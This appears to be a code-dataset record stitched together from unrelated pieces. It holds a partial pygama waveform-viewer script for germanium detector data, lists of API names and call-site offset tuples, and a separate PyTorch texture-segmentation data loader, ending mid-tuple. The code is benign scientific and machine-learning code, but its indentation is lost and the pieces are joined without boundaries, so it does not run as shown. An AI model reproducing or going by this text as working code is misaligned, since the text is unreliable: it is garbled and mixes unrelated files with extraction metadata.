query = db.Query()
table = calDB.table("cal_pass1")
vals = table.all()
df_cal = pd.DataFrame(vals) # <<---- omg awesome
df_cal = df_cal.loc[df_cal.ds==ds_lo]
p1cal = df_cal.iloc[0]["p1cal"]
cal = p1cal * np.asarray(t2df["e_ftp"])
xlo = 2.46e6
xhi = 2.5e6
hE, xE = ph.get_hist(t2df["energy"], bins=100, range=(xlo, xhi))
plt.semilogy(xE, hE, ls='steps', lw=1, c='r')
import matplotlib.ticker as ticker
plt.gca().xaxis.set_major_formatter(ticker.FormatStrFormatter('%0.4e'))
plt.locator_params(axis='x', nbins=5)
plt.xlabel("Energy (uncal.)", ha='right', x=1)
plt.ylabel("Counts", ha='right', y=1)
plt.show()
# plt.savefig(f"./plots/cage_ds{ds.ds_lo}_winK40.pdf")
t1df = pd.DataFrame()
for run in ds.paths:
ft1 = ds.paths[run]["t1_path"]
print(f"Scanning ds {ds.ds_lo}, run {run}\n file: {ft1}")
for chunk in pd.read_hdf(ft1, 'ORSIS3302DecoderForEnergy', chunksize=5e4):
t1df_win = chunk.loc[(chunk.energy > xlo) & (chunk.energy < xhi)]
print(t1df_win.shape)
t1df = pd.concat([t1df, t1df_win], ignore_index=True)
print('It worked? maybe?')
h5_opts = {
"mode":"w", # overwrite existing
"append":False,
"format":"table",
# "complib":"blosc:zlib", # no compression, increases I/O speed
# "complevel":1,
# "data_columns":["ievt"]
}
t1df.reset_index(inplace=True)
t1df.to_hdf('./test_dt_file.h5', key="df_windowed", **h5_opts)
print("wrote file")
exit()
# key = "/ORSIS3302DecoderForEnergy"
# wf_chunk = pd.read_hdf(t1df, key, where="ievt < {}".format(75000))
# wf_chunk.reset_index(inplace=True) # required step -- fix pygama "append" bug
t2df = t2df.reset_index(drop=True)
# create waveform block. mask wfs of unequal lengths
number = 20000
icols = []
for idx, col in enumerate(t1df.columns):
if isinstance(col, int):
icols.append(col)
wfs = t1df[icols].values
wfs = np.asarray(wfs)
# wfs = wfs[:number]
# t2df_chunk = t2df[:number]
# print(wf_block.shape, type(wf_block))
# print(t2df_chunk)
t0 = np.asarray(t2df['t0'])
energy = np.asarray(t2df['e_ftp'])
# energy = 0.4066852222964447 * energy
baseline = wfs[:, 0:500]
avg_bl = []
for i in range(len(wfs)):
avg_bl.append(np.mean(baseline[i], keepdims=True))
avg_bl = np.asarray(avg_bl)
wfs = np.asarray(wfs)
wfs = wfs - avg_bl
clk = 100e6
decay = 78
wfs = pz(wfs, decay, clk)
t100 = []
t0_raw = []
wf_raw = []
e_raw = []
for i in range(len(wfs)):
t100_t = np.where(wfs[i] > energy[i])
t100_t = t100_t[0]
if len(t100_t) > 0:
t100_t = t100_t[0]
t100.append(t100_t)
t0_raw.append(t0[i])
wf_raw.append(wfs[i])
e_raw.append(energy[i])
e_raw = np.asarray(e_raw)
index = np.where(e_raw < 7300)[0]
t100 = np.asarray(t100)
t0_raw = np.asarray(t0_raw)
wf_raw = np.asarray(wf_raw)
e_raw = e_raw[index]
t100 = t100[index]
t0_raw = t0_raw[index]
wf_raw = wf_raw[index]
e_raw = 0.4066852222964447 * e_raw
wf_raw = 0.4066852222964447 * wf_raw
hist, bins = np.histogram(e_raw, bins=2700, range=[0,2700])
b = (bins[:-1] + bins[1:]) / 2
plt.plot(b, hist, ls="steps", color='black')
plt.tight_layout()
plt.show()
plt.clf()
# xvals = np.arange(0,3000)
# start = time.time()
# for i in range(len(t100)):
#
# plt.plot(xvals, wf_raw[i], lw=1)
# plt.vlines(t0_raw[i], np.amin(wf_raw[i]), e_raw[i], color='r', linewidth=1.5, label='t0')
# plt.vlines(t100[i], np.amin(wf_raw[i]), e_raw[i], color='g', linewidth=1.5, label='t100')
# plt.hlines(e_raw[i], t0_raw[i], 3000, color='k', linewidth=1.5, zorder=10, label='e_ftp')
# plt.xlabel('Sample Number', ha='right', x=1.0)
# plt.ylabel('ADC Value', ha='right', y=1.0)
# plt.legend()
# plt.tight_layout()
# plt.show()
# exit()
"""
a1 = (t100 - t0_raw) * e_raw
a_wf = []
for i in range(len(wf_raw)):
a2 = sum(wf_raw[i,t0[i]:t100[i]])
a_wf.append(a2)
a_drift = a1 - a_wf
# a_drift = a_drift.tolist()
# print(a_drift)
# exit()
a_test = a_drift[np.where((e_raw > 2600) & (e_raw < 2630))]
e_test = e_raw[np.where((e_raw > 2600) & (e_raw < 2630))]
plt.hist2d(e_test, a_test, bins=[30,100], range=[[2600, 2630], [0, np.amax(a_test)]], norm=LogNorm(), cmap='jet')
cbar = plt.colorbar()
cbar.ax.set_ylabel('Counts')
plt.tight_layout()
plt.show()
exit()
"""
xvals = np.arange(0,3000)
start = time.time()
for i in range(0,number):
# for i in range(0,5):
plt.plot(xvals, wfs[i], lw=1)
plt.vlines(t0[i], np.amin(wfs[i]), energy[i], color='r', linewidth=1.5, label='t0')
plt.vlines(t100[i], np.amin(wfs[i]), energy[i], color='g', linewidth=1.5, label='t100')
plt.hlines(energy[i], t0[i], 3000, color='k', linewidth=1.5, zorder=10, label='e_ftp')
plt.xlabel('Sample Number', ha='right', x=1.0)
plt.ylabel('ADC Value', ha='right', y=1.0)
plt.legend()
plt.tight_layout()
plt.show()
# input:
# fsignal: PZ-corrected and INL-corrected signal of length len, from channel chan
# Dets: MJ detector info data structure
# PSA: contains filter params to use for trapezoids
# CTC_factor: the value used in the correction, usually CTC.e_dt_slope[chan]
# outputs:
# returned value: energy in keV, or -1.0f in case of error
# t0: start time of drift/signal
# e_adc: energy in ADC units
# e_raw: uncorrected energy in 0.001 ADC units
# drift: charge trapping value (drift time * charge)
# to be used for optimizing correction, in ADC units
# CTC correction = drift*ctc_factor[chan]
def pz(wfs, decay, clk):
"""
pole-zero correct a waveform
decay is in us, clk is in Hz
"""
# get linear filter parameters, in units of [clock ticks]
dt = decay * (1e10 / clk)
rc = 1 / np.exp(1 / dt)
num, den = [1, -1], [1, -rc]
# reversing num and den does the inverse transform (ie, PZ corrects)
pz_wfs = signal.lfilter(den, num, wfs)
return pz_wfs
# return wfs, t2df_chunk
if __name__=="__main__":
main()
|
[
"argparse.ArgumentParser",
"numpy.amin",
"matplotlib.pyplot.clf",
"numpy.histogram",
"matplotlib.colors.LogNorm",
"numpy.arange",
"numpy.exp",
"numpy.mean",
"matplotlib.pyplot.gca",
"matplotlib.pyplot.tight_layout",
"matplotlib.pyplot.hlines",
"pandas.DataFrame",
"matplotlib.pyplot.locator_params",
"pandas.read_hdf",
"scipy.signal.lfilter",
"matplotlib.pyplot.colorbar",
"matplotlib.ticker.FormatStrFormatter",
"matplotlib.pyplot.semilogy",
"pandas.concat",
"pygama.DataSet",
"matplotlib.pyplot.show",
"pygama.utils.set_plot_style",
"numpy.asarray",
"matplotlib.pyplot.legend",
"tinydb.Query",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.plot",
"time.time",
"numpy.where",
"matplotlib.pyplot.xlabel"
] |
[((532, 555), 'pygama.utils.set_plot_style', 'set_plot_style', (['"""clint"""'], {}), "('clint')\n", (546, 555), False, 'from pygama.utils import set_plot_style\n'), ((669, 732), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""waveform viewer for mj60"""'}), "(description='waveform viewer for mj60')\n", (692, 732), False, 'import argparse\n'), ((1945, 1972), 'pandas.read_hdf', 'pd.read_hdf', (['t2df'], {'key': '"""df"""'}), "(t2df, key='df')\n", (1956, 1972), True, 'import pandas as pd\n'), ((2164, 2173), 'matplotlib.pyplot.clf', 'plt.clf', ([], {}), '()\n', (2171, 2173), True, 'import matplotlib.pyplot as plt\n'), ((3039, 3053), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ([], {}), '()\n', (3051, 3053), True, 'import matplotlib.pyplot as plt\n'), ((3150, 3193), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Energy (keV)"""'], {'ha': '"""right"""', 'x': '(1)'}), "('Energy (keV)', ha='right', x=1)\n", (3160, 3193), True, 'import matplotlib.pyplot as plt\n'), ((3198, 3228), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['n'], {'ha': '"""right"""', 'y': '(1)'}), "(n, ha='right', y=1)\n", (3208, 3228), True, 'import matplotlib.pyplot as plt\n'), ((3816, 3834), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (3832, 3834), True, 'import matplotlib.pyplot as plt\n'), ((3839, 3849), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3847, 3849), True, 'import matplotlib.pyplot as plt\n'), ((4024, 4051), 'pandas.read_hdf', 'pd.read_hdf', (['t2df'], {'key': '"""df"""'}), "(t2df, key='df')\n", (4035, 4051), True, 'import pandas as pd\n'), ((5760, 5770), 'tinydb.Query', 'db.Query', ([], {}), '()\n', (5768, 5770), True, 'import tinydb as db\n'), ((5844, 5862), 'pandas.DataFrame', 'pd.DataFrame', (['vals'], {}), '(vals)\n', (5856, 5862), True, 'import pandas as pd\n'), ((6114, 6159), 'matplotlib.pyplot.semilogy', 'plt.semilogy', (['xE', 'hE'], {'ls': '"""steps"""', 'lw': '(1)', 'c': '"""r"""'}), "(xE, hE, ls='steps', lw=1, c='r')\n", (6126, 6159), True, 'import matplotlib.pyplot as plt\n'), ((6280, 6317), 'matplotlib.pyplot.locator_params', 'plt.locator_params', ([], {'axis': '"""x"""', 'nbins': '(5)'}), "(axis='x', nbins=5)\n", (6298, 6317), True, 'import matplotlib.pyplot as plt\n'), ((6323, 6369), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Energy (uncal.)"""'], {'ha': '"""right"""', 'x': '(1)'}), "('Energy (uncal.)', ha='right', x=1)\n", (6333, 6369), True, 'import matplotlib.pyplot as plt\n'), ((6374, 6411), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Counts"""'], {'ha': '"""right"""', 'y': '(1)'}), "('Counts', ha='right', y=1)\n", (6384, 6411), True, 'import matplotlib.pyplot as plt\n'), ((6416, 6426), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (6424, 6426), True, 'import matplotlib.pyplot as plt\n'), ((6498, 6512), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (6510, 6512), True, 'import pandas as pd\n'), ((7804, 7819), 'numpy.asarray', 'np.asarray', (['wfs'], {}), '(wfs)\n', (7814, 7819), True, 'import numpy as np\n'), ((7957, 7979), 'numpy.asarray', 'np.asarray', (["t2df['t0']"], {}), "(t2df['t0'])\n", (7967, 7979), True, 'import numpy as np\n'), ((7993, 8018), 'numpy.asarray', 'np.asarray', (["t2df['e_ftp']"], {}), "(t2df['e_ftp'])\n", (8003, 8018), True, 'import numpy as np\n'), ((8210, 8228), 'numpy.asarray', 'np.asarray', (['avg_bl'], {}), '(avg_bl)\n', (8220, 8228), True, 'import numpy as np\n'), ((8239, 8254), 'numpy.asarray', 'np.asarray', (['wfs'], {}), '(wfs)\n', (8249, 8254), True, 'import numpy as np\n'), ((8714, 8731), 'numpy.asarray', 'np.asarray', (['e_raw'], {}), '(e_raw)\n', (8724, 8731), True, 'import numpy as np\n'), ((8781, 8797), 'numpy.asarray', 'np.asarray', (['t100'], {}), '(t100)\n', (8791, 8797), True, 'import numpy as np\n'), ((8811, 8829), 'numpy.asarray', 'np.asarray', (['t0_raw'], {}), '(t0_raw)\n', (8821, 8829), True, 'import numpy as np\n'), ((8843, 8861), 'numpy.asarray', 'np.asarray', (['wf_raw'], {}), '(wf_raw)\n', (8853, 8861), True, 'import numpy as np\n'), ((9064, 9111), 'numpy.histogram', 'np.histogram', (['e_raw'], {'bins': '(2700)', 'range': '[0, 2700]'}), '(e_raw, bins=2700, range=[0, 2700])\n', (9076, 9111), True, 'import numpy as np\n'), ((9150, 9194), 'matplotlib.pyplot.plot', 'plt.plot', (['b', 'hist'], {'ls': '"""steps"""', 'color': '"""black"""'}), "(b, hist, ls='steps', color='black')\n", (9158, 9194), True, 'import matplotlib.pyplot as plt\n'), ((9199, 9217), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (9215, 9217), True, 'import matplotlib.pyplot as plt\n'), ((9222, 9232), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (9230, 9232), True, 'import matplotlib.pyplot as plt\n'), ((9237, 9246), 'matplotlib.pyplot.clf', 'plt.clf', ([], {}), '()\n', (9244, 9246), True, 'import matplotlib.pyplot as plt\n'), ((10580, 10598), 'numpy.arange', 'np.arange', (['(0)', '(3000)'], {}), '(0, 3000)\n', (10589, 10598), True, 'import numpy as np\n'), ((10610, 10621), 'time.time', 'time.time', ([], {}), '()\n', (10619, 10621), False, 'import os, time, json\n'), ((12204, 12233), 'scipy.signal.lfilter', 'signal.lfilter', (['den', 'num', 'wfs'], {}), '(den, num, wfs)\n', (12218, 12233), True, 'import scipy.signal as signal\n'), ((1218, 1262), 'pygama.DataSet', 'DataSet', (['ds_lo', 'ds_hi'], {'md': 'run_db', 'cal': 'cal_db'}), '(ds_lo, ds_hi, md=run_db, cal=cal_db)\n', (1225, 1262), False, 'from pygama import DataSet\n'), ((5980, 6005), 'numpy.asarray', 'np.asarray', (["t2df['e_ftp']"], {}), "(t2df['e_ftp'])\n", (5990, 6005), True, 'import numpy as np\n'), ((6240, 6274), 'matplotlib.ticker.FormatStrFormatter', 'ticker.FormatStrFormatter', (['"""%0.4e"""'], {}), "('%0.4e')\n", (6265, 6274), True, 'import matplotlib.ticker as ticker\n'), ((6667, 6731), 'pandas.read_hdf', 'pd.read_hdf', (['ft1', '"""ORSIS3302DecoderForEnergy"""'], {'chunksize': '(50000.0)'}), "(ft1, 'ORSIS3302DecoderForEnergy', chunksize=50000.0)\n", (6678, 6731), True, 'import pandas as pd\n'), ((8451, 8479), 'numpy.where', 'np.where', (['(wfs[i] > energy[i])'], {}), '(wfs[i] > energy[i])\n', (8459, 8479), True, 'import numpy as np\n'), ((8744, 8766), 'numpy.where', 'np.where', (['(e_raw < 7300)'], {}), '(e_raw < 7300)\n', (8752, 8766), True, 'import numpy as np\n'), ((10687, 10716), 'matplotlib.pyplot.plot', 'plt.plot', (['xvals', 'wfs[i]'], {'lw': '(1)'}), '(xvals, wfs[i], lw=1)\n', (10695, 10716), True, 'import matplotlib.pyplot as plt\n'), ((10913, 11003), 'matplotlib.pyplot.hlines', 'plt.hlines', (['energy[i]', 't0[i]', '(3000)'], {'color': '"""k"""', 'linewidth': '(1.5)', 'zorder': '(10)', 'label': '"""e_ftp"""'}), "(energy[i], t0[i], 3000, color='k', linewidth=1.5, zorder=10,\n label='e_ftp')\n", (10923, 11003), True, 'import matplotlib.pyplot as plt\n'), ((11008, 11054), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Sample Number"""'], {'ha': '"""right"""', 'x': '(1.0)'}), "('Sample Number', ha='right', x=1.0)\n", (11018, 11054), True, 'import matplotlib.pyplot as plt\n'), ((11063, 11105), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""ADC Value"""'], {'ha': '"""right"""', 'y': '(1.0)'}), "('ADC Value', ha='right', y=1.0)\n", (11073, 11105), True, 'import matplotlib.pyplot as plt\n'), ((11114, 11126), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (11124, 11126), True, 'import matplotlib.pyplot as plt\n'), ((11135, 11153), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (11151, 11153), True, 'import matplotlib.pyplot as plt\n'), ((11162, 11172), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (11170, 11172), True, 'import matplotlib.pyplot as plt\n'), ((12069, 12083), 'numpy.exp', 'np.exp', (['(1 / dt)'], {}), '(1 / dt)\n', (12075, 12083), True, 'import numpy as np\n'), ((2364, 2373), 'matplotlib.colors.LogNorm', 'LogNorm', ([], {}), '()\n', (2371, 2373), False, 'from matplotlib.colors import LogNorm\n'), ((6860, 6906), 'pandas.concat', 'pd.concat', (['[t1df, t1df_win]'], {'ignore_index': '(True)'}), '([t1df, t1df_win], ignore_index=True)\n', (6869, 6906), True, 'import pandas as pd\n'), ((8160, 8195), 'numpy.mean', 'np.mean', (['baseline[i]'], {'keepdims': '(True)'}), '(baseline[i], keepdims=True)\n', (8167, 8195), True, 'import numpy as np\n'), ((10743, 10758), 'numpy.amin', 'np.amin', (['wfs[i]'], {}), '(wfs[i])\n', (10750, 10758), True, 'import numpy as np\n'), ((10837, 10852), 'numpy.amin', 'np.amin', (['wfs[i]'], {}), '(wfs[i])\n', (10844, 10852), True, 'import numpy as np\n'), ((6204, 6213), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (6211, 6213), True, 'import matplotlib.pyplot as plt\n')]
|
import numpy as np
import torch
import torchvision.transforms as transforms
import torch.utils.data as data
import os
import pickle
import numpy as np
import nltk
from PIL import Image
import cv2
import glob
import random
# depracated
# def get_data_direct(img_size, texture_size,
# imgs_fn = None, textures_fn = None, sample_dir = None, sep = ':', format = '*.png',
# mean = [0.485, 0.456, 0.406], std = [0.229, 0.224, 0.225]):
# if sample_dir is None:
# imgs_fn = imgs_fn.split(sep)
# textures_fn = textures_fn.split(sep)
# else:
# all_images = glob.glob(os.path.join(sample_dir, format))
# all_images = sorted(all_images)
# imgs_fn = []
# textures_fn = []
# for file in all_images:
# if 'img' in file.split('/')[-1]:
# imgs_fn.append(file)
# elif 'texture' in file.split('/')[-1]:
# textures_fn.append(file)
# else:
# raise ValueError('not sure which type if this one: %s'%(file))
# batch_size = len(imgs_fn)
# assert len(imgs_fn) == len(textures_fn)
# imgs = []
# textures = []
# for index in range(batch_size):
# img_cur = Image.open(imgs_fn[index])
# img_cur = img_cur.resize([img_size, img_size])
# # it could be rgba
# img_cur = (np.asarray(img_cur)[...,:3] / 255.0 - mean) / std
# imgs.append(img_cur)
#
# texture_cur = Image.open(textures_fn[index])
# texture_cur = texture_cur.resize([texture_size, texture_size])
# # it could be rgba
# texture_cur = (np.asarray(texture_cur)[...,:3] / 255.0 - mean) / std
# textures.append(texture_cur)
#
# imgs = np.array(imgs).reshape([batch_size, img_size, img_size, 3])
# textures = np.array(textures).reshape([batch_size, texture_size, texture_size, 3])
# imgs = np.transpose(imgs, [0, 3, 1, 2])
# textures = np.transpose(textures, [0, 3, 1, 2])
# return imgs, textures
#
def get_data_direct(img_size, imgs_dir, texture_size = None, textures_dir = None,
format = '*.png',
mean = [0.485, 0.456, 0.406], std = [0.229, 0.224, 0.225]):
imgs = glob.glob(os.path.join(imgs_dir, format))
imgs = sorted(imgs)
if textures_dir is not None:
textures = glob.glob(os.path.join(textures_dir, format))
textures = sorted(textures)
batch_size = len(imgs) * len(textures) if textures_dir is not None else len(imgs)
imgs_data = []
textures_data = []
if textures_dir is not None:
assert texture_size is not None
for img_index in range(len(imgs)):
for texture_index in range(len(textures)):
img_cur = Image.open(imgs[img_index])
img_cur = img_cur.resize([img_size, img_size])
# it could be rgba
img_cur = (np.asarray(img_cur)[...,:3] / 255.0 - mean) / std
imgs_data.append(img_cur)
texture_cur = Image.open(textures[texture_index])
texture_cur = texture_cur.resize([texture_size, texture_size])
# it could be rgba
texture_cur = (np.asarray(texture_cur)[...,:3] / 255.0 - mean) / std
textures_data.append(texture_cur)
else:
for img_index in range(len(imgs)):
img_cur = Image.open(imgs[img_index])
img_cur = img_cur.resize([img_size, img_size])
# it could be rgba
img_cur = (np.asarray(img_cur)[...,:3] / 255.0 - mean) / std
imgs_data.append(img_cur)
imgs_data = np.array(imgs_data).reshape([batch_size, img_size, img_size, 3])
imgs_data = np.transpose(imgs_data, [0, 3, 1, 2])
if textures_dir is not None:
textures_data = np.array(textures_data).reshape([batch_size, texture_size, texture_size, 3])
textures_data = np.transpose(textures_data, [0, 3, 1, 2])
return imgs_data, textures_data
class texture_seg_dataset(object):
def __init__(self, data_path, img_size, segmentation_regions, texture_size,
shuffle = True, use_same_from = True,
mean = [0.485, 0.456, 0.406], std = [0.229, 0.224, 0.225]): # from torch normalize
self.shuffle = shuffle
self.img_size = img_size
self.segmentation_regions = segmentation_regions
self.texture_size = texture_size
self.folders = glob.glob(os.path.join(data_path, '*/'))
self.use_same_from = use_same_from
self.mean = mean
self.std = std
# num_seg must be smaller than scene_num
assert (len(self.folders) >= self.segmentation_regions)
def generate_random_masks(self, points = None):
# use batch_size = 1
# return [size, size, segmentation_regions]
batch_size = 1
xs, ys = np.meshgrid(np.arange(0, self.img_size), np.arange(0, self.img_size))
if points is None:
n_points = [self.segmentation_regions]
points = [np.random.randint(0, self.img_size, size=(n_points[i], 2)) for i in range(batch_size)]
masks = []
for b in range(batch_size):
dists_b = [np.sqrt((xs - p[0])**2 + (ys - p[1])**2) for p in points[b]]
voronoi = np.argmin(dists_b, axis=0)
masks_b = np.zeros((self.img_size, self.img_size, self.segmentation_regions))
for m in range(self.segmentation_regions):
masks_b[:,:,m][voronoi == m] = 1
masks.append(masks_b)
return masks[0]
def random_crop(self, image, crop_height, crop_width):
if (crop_width <= image.shape[1]) and (crop_height <= image.shape[0]):
x = np.random.randint(0, image.shape[1]-crop_width)
y = np.random.randint(0, image.shape[0]-crop_height)
return image[y:y+crop_height, x:x+crop_width, :]
else:
raise Exception('Crop shape exceeds image dimensions!')
def get_data(self, format = '*.jpg'):
mask = self.generate_random_masks()
choose_from = []
img = np.zeros([self.img_size, self.img_size, 3])
sampled_folders = random.sample(self.folders, self.segmentation_regions)
texture_mask = []
for index, folder in enumerate(sampled_folders):
files = glob.glob(os.path.join(folder, format))
file_cur = random.choice(files)
# print (file_cur)
img_cur = Image.open(file_cur)
img_cur = img_cur.resize([self.img_size, self.img_size])
img_cur = (np.asarray(img_cur) / 255.0 - self.mean) / self.std
img[mask[..., index] == 1] = img_cur[mask[..., index] == 1]
if self.use_same_from:
texture_cur = img_cur
else:
file_cur = random.choice(files)
texture_cur = np.asarray(Image.open(file_cur))
texture = self.random_crop(texture_cur, self.texture_size, self.texture_size)
texture_mask.append({'mask': mask[...,index], 'texture':texture})
return img, texture_mask
def feed(self, batch_size = None):
if batch_size is None:
return self.get_data()
else:
img_texture_mask = []
# add alls in one img iput
# for _ in range(batch_size // self.segmentation_regions + 1):
# img, texture_mask = self.get_data()
# for index in range(self.segmentation_regions):
# patch = {}
# patch['img'] = img
# patch['texture'] = texture_mask[index]['texture']
# patch['mask'] = texture_mask[index]['mask']
# img_texture_mask.append(patch)
# add each one separatly
for _ in range(batch_size):
img, texture_mask = self.get_data()
# random choice one from cluster
index = np.random.choice(self.segmentation_regions, 1)[0]
patch = {}
patch['img'] = img
patch['texture'] = texture_mask[index]['texture']
patch['mask'] = texture_mask[index]['mask']
img_texture_mask.append(patch)
img_texture_mask = img_texture_mask[:batch_size]
if self.shuffle:
random.shuffle(img_texture_mask)
imgs = [item['img'] for item in img_texture_mask]
textures = [item['texture'] for item in img_texture_mask]
masks = [item['mask'] for item in img_texture_mask]
imgs = np.array(imgs).reshape([batch_size, self.img_size, self.img_size, 3])
textures = np.array(textures).reshape([batch_size, self.texture_size, self.texture_size, 3])
masks = np.array(masks).reshape([batch_size, self.img_size, self.img_size, 1])
imgs = np.transpose(imgs, [0, 3, 1, 2])
textures = np.transpose(textures, [0, 3, 1, 2])
masks = np.transpose(masks, [0, 3, 1, 2])
return imgs, textures, masks
if __name__ == '__main__':
data_set = texture_seg_dataset('./dataset/dtd/images', img_size = 256, segmentation_regions= 3, texture_size = 64)
imgs, textures, masks = data_set.feed(batch_size = 2)
print ('img shape: ', imgs.shape)
print ('texture shape: ', textures.shape )
print ('masks shape: ', masks.shape)
raise
img, texture_mask = data_set.get_data()
print (img.shape)
print (len(texture_mask))
img = cv2.cvtColor(np.uint8(img), cv2.COLOR_BGR2RGB)
cv2.imwrite('test_img.png', img)
# cv2.imshow('img', img/ 255.0)
for i in range(3):
texture_mask[i]['texture'] = cv2.cvtColor(np.uint8(texture_mask[i]['texture']) , cv2.COLOR_BGR2RGB)
# cv2.imwrite('test_texture_%d.png'%(i), texture_mask[i]['texture']
cv2.imshow('mask_%d'%(i), texture_mask[i]['mask'])
cv2.imshow('texture_%d'%(i), texture_mask[i]['texture'])
cv2.waitKey(0)
|
[
"numpy.uint8",
"cv2.waitKey",
"cv2.imwrite",
"random.sample",
"random.shuffle",
"numpy.zeros",
"numpy.transpose",
"numpy.argmin",
"PIL.Image.open",
"random.choice",
"numpy.asarray",
"numpy.random.randint",
"numpy.array",
"numpy.arange",
"numpy.random.choice",
"cv2.imshow",
"os.path.join",
"numpy.sqrt"
] |
[((3733, 3770), 'numpy.transpose', 'np.transpose', (['imgs_data', '[0, 3, 1, 2]'], {}), '(imgs_data, [0, 3, 1, 2])\n', (3745, 3770), True, 'import numpy as np\n'), ((9622, 9654), 'cv2.imwrite', 'cv2.imwrite', (['"""test_img.png"""', 'img'], {}), "('test_img.png', img)\n", (9633, 9654), False, 'import cv2\n'), ((10027, 10041), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (10038, 10041), False, 'import cv2\n'), ((2254, 2284), 'os.path.join', 'os.path.join', (['imgs_dir', 'format'], {}), '(imgs_dir, format)\n', (2266, 2284), False, 'import os\n'), ((3930, 3971), 'numpy.transpose', 'np.transpose', (['textures_data', '[0, 3, 1, 2]'], {}), '(textures_data, [0, 3, 1, 2])\n', (3942, 3971), True, 'import numpy as np\n'), ((6138, 6181), 'numpy.zeros', 'np.zeros', (['[self.img_size, self.img_size, 3]'], {}), '([self.img_size, self.img_size, 3])\n', (6146, 6181), True, 'import numpy as np\n'), ((6208, 6262), 'random.sample', 'random.sample', (['self.folders', 'self.segmentation_regions'], {}), '(self.folders, self.segmentation_regions)\n', (6221, 6262), False, 'import random\n'), ((9584, 9597), 'numpy.uint8', 'np.uint8', (['img'], {}), '(img)\n', (9592, 9597), True, 'import numpy as np\n'), ((9907, 9957), 'cv2.imshow', 'cv2.imshow', (["('mask_%d' % i)", "texture_mask[i]['mask']"], {}), "('mask_%d' % i, texture_mask[i]['mask'])\n", (9917, 9957), False, 'import cv2\n'), ((9966, 10022), 'cv2.imshow', 'cv2.imshow', (["('texture_%d' % i)", "texture_mask[i]['texture']"], {}), "('texture_%d' % i, texture_mask[i]['texture'])\n", (9976, 10022), False, 'import cv2\n'), ((2372, 2406), 'os.path.join', 'os.path.join', (['textures_dir', 'format'], {}), '(textures_dir, format)\n', (2384, 2406), False, 'import os\n'), ((3406, 3433), 'PIL.Image.open', 'Image.open', (['imgs[img_index]'], {}), '(imgs[img_index])\n', (3416, 3433), False, 'from PIL import Image\n'), ((3652, 3671), 'numpy.array', 'np.array', (['imgs_data'], {}), '(imgs_data)\n', (3660, 3671), True, 'import numpy as np\n'), ((4490, 4519), 'os.path.join', 'os.path.join', (['data_path', '"""*/"""'], {}), "(data_path, '*/')\n", (4502, 4519), False, 'import os\n'), ((4911, 4938), 'numpy.arange', 'np.arange', (['(0)', 'self.img_size'], {}), '(0, self.img_size)\n', (4920, 4938), True, 'import numpy as np\n'), ((4940, 4967), 'numpy.arange', 'np.arange', (['(0)', 'self.img_size'], {}), '(0, self.img_size)\n', (4949, 4967), True, 'import numpy as np\n'), ((5321, 5347), 'numpy.argmin', 'np.argmin', (['dists_b'], {'axis': '(0)'}), '(dists_b, axis=0)\n', (5330, 5347), True, 'import numpy as np\n'), ((5370, 5437), 'numpy.zeros', 'np.zeros', (['(self.img_size, self.img_size, self.segmentation_regions)'], {}), '((self.img_size, self.img_size, self.segmentation_regions))\n', (5378, 5437), True, 'import numpy as np\n'), ((5756, 5805), 'numpy.random.randint', 'np.random.randint', (['(0)', '(image.shape[1] - crop_width)'], {}), '(0, image.shape[1] - crop_width)\n', (5773, 5805), True, 'import numpy as np\n'), ((5820, 5870), 'numpy.random.randint', 'np.random.randint', (['(0)', '(image.shape[0] - crop_height)'], {}), '(0, image.shape[0] - crop_height)\n', (5837, 5870), True, 'import numpy as np\n'), ((6429, 6449), 'random.choice', 'random.choice', (['files'], {}), '(files)\n', (6442, 6449), False, 'import random\n'), ((6503, 6523), 'PIL.Image.open', 'Image.open', (['file_cur'], {}), '(file_cur)\n', (6513, 6523), False, 'from PIL import Image\n'), ((8936, 8968), 'numpy.transpose', 'np.transpose', (['imgs', '[0, 3, 1, 2]'], {}), '(imgs, [0, 3, 1, 2])\n', (8948, 8968), True, 'import numpy as np\n'), ((8992, 9028), 'numpy.transpose', 'np.transpose', (['textures', '[0, 3, 1, 2]'], {}), '(textures, [0, 3, 1, 2])\n', (9004, 9028), True, 'import numpy as np\n'), ((9049, 9082), 'numpy.transpose', 'np.transpose', (['masks', '[0, 3, 1, 2]'], {}), '(masks, [0, 3, 1, 2])\n', (9061, 9082), True, 'import numpy as np\n'), ((9765, 9801), 'numpy.uint8', 'np.uint8', (["texture_mask[i]['texture']"], {}), "(texture_mask[i]['texture'])\n", (9773, 9801), True, 'import numpy as np\n'), ((2770, 2797), 'PIL.Image.open', 'Image.open', (['imgs[img_index]'], {}), '(imgs[img_index])\n', (2780, 2797), False, 'from PIL import Image\n'), ((3046, 3081), 'PIL.Image.open', 'Image.open', (['textures[texture_index]'], {}), '(textures[texture_index])\n', (3056, 3081), False, 'from PIL import Image\n'), ((3829, 3852), 'numpy.array', 'np.array', (['textures_data'], {}), '(textures_data)\n', (3837, 3852), True, 'import numpy as np\n'), ((5072, 5130), 'numpy.random.randint', 'np.random.randint', (['(0)', 'self.img_size'], {'size': '(n_points[i], 2)'}), '(0, self.img_size, size=(n_points[i], 2))\n', (5089, 5130), True, 'import numpy as np\n'), ((5238, 5282), 'numpy.sqrt', 'np.sqrt', (['((xs - p[0]) ** 2 + (ys - p[1]) ** 2)'], {}), '((xs - p[0]) ** 2 + (ys - p[1]) ** 2)\n', (5245, 5282), True, 'import numpy as np\n'), ((6376, 6404), 